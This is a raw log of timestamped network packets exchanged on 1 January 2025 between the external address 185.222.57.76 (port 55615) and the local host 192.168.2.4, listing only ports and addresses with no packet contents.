Jan 1, 2025 12:32:23.480977058 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480986118 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480993032 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.480998039 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481013060 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481020927 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481070995 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481080055 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481092930 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481165886 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481173992 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481178045 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481184006 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481193066 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481203079 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481210947 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481251955 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481261015 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481265068 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481272936 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481312990 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481321096 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481417894 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481426954 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481435061 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481442928 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481455088 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481462955 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481498003 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481507063 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481523037 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481533051 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481575012 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481584072 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481600046 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481609106 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481659889 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481667995 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481678009 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481765985 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481775045 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481784105 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481791019 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481800079 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481825113 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481833935 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481841087 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481848955 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481865883 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481874943 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481937885 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481946945 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481951952 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481964111 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.481996059 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482050896 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482059956 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482068062 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482090950 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482100010 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482115030 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482122898 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482141018 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482148886 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482199907 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482208014 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482297897 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482306004 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482311010 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482317924 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482327938 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482336998 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482352972 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482362032 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482403994 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482412100 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482429028 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482436895 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482451916 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482460022 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482484102 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482491970 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482525110 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482532978 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482589960 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482598066 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482604980 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482647896 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482656956 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482664108 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482682943 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482691050 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482702971 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482709885 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482744932 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482753038 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482805967 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482815027 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482825994 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482834101 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482867956 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482877016 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482887030 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482923031 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482933998 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.482963085 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483004093 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483012915 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483021021 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483030081 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483076096 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483084917 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483102083 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483109951 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483127117 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483135939 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483164072 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483171940 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483228922 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483241081 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483249903 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483258963 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483275890 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483283997 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483335972 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483344078 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483388901 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483397007 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483412027 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483422995 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483442068 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483449936 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483510017 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483517885 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483577967 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483584881 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483594894 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.483603001 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:23.526962996 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.490134001 CET	55615	49748	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.491925001 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.496741056 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.497068882 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.497710943 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.502449036 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.537146091 CET	49748	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.849889040 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.854722977 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.854734898 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.854787111 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.854796886 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.854809999 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.854818106 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.854827881 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.854831934 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.854861975 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.854887962 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.855108976 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.855118036 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.855120897 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.855231047 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.859736919 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.859745979 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.859781027 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.859790087 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.859817028 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.859824896 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.859833956 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.859888077 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.902976990 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.903100967 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.930613041 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.930811882 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.935652971 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.935672045 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.935726881 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.935744047 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.935774088 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.935781956 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.935797930 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.935811043 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.935832977 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.935837984 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.935847044 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.935875893 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.935908079 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.935928106 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.935936928 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.935991049 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.935997009 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.935998917 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.936012983 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.936048985 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.936084986 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.936094046 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.936120033 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.936161995 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.936161995 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.936197042 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.936207056 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.936216116 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.936243057 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.936247110 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.936280966 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.936294079 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.936356068 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.936386108 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.936395884 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.936398983 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.936424017 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.936480999 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.936496973 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.936506033 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.936638117 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.940584898 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.940640926 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.940695047 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.940706015 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.940726995 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.940762043 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.940768957 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.940800905 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.940809965 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.940843105 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.940902948 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.940912962 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.940927982 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.940960884 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.941015005 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941030025 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.941077948 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.941078901 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941116095 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941127062 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941149950 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.941215038 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941215038 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.941257000 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941272974 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.941310883 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.941324949 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941378117 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941385984 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941395044 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.941430092 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941432953 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.941474915 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941483974 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.941581964 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941590071 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941651106 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941656113 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.941692114 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941700935 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941704035 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.941721916 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941737890 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941759109 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.941778898 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.941828012 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941836119 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941843987 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941853046 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941864967 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941873074 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941896915 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.941921949 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941927910 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.941930056 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941936016 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941958904 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.941987991 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.941992998 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.942003012 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.942033052 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.942063093 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.942064047 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.942073107 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.942076921 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.942085981 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.942097902 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.942106009 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.942117929 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.942126989 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.942130089 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.942147017 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.942150116 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.942157984 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.942183018 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.942202091 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.942209959 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.942245007 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.942246914 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.942253113 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.942269087 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.942276955 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.942279100 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.942305088 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.942317963 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.942325115 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.942328930 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.942358017 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.942408085 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.945449114 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.945537090 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.945545912 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.945602894 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.945606947 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.945612907 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.945617914 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.945622921 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.945657969 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.945667982 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.945674896 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.945694923 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.945703983 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.945714951 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.945724964 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.945732117 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.945749998 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.945777893 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.945787907 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.945805073 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.945813894 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.945816040 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.945841074 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.945847034 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.945857048 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.945862055 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.945877075 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.945900917 CET	55615	49749	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:24.945919991 CET	49749	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:24.945934057 CET	55615	49749	185.222.57.76	192.168.2.4
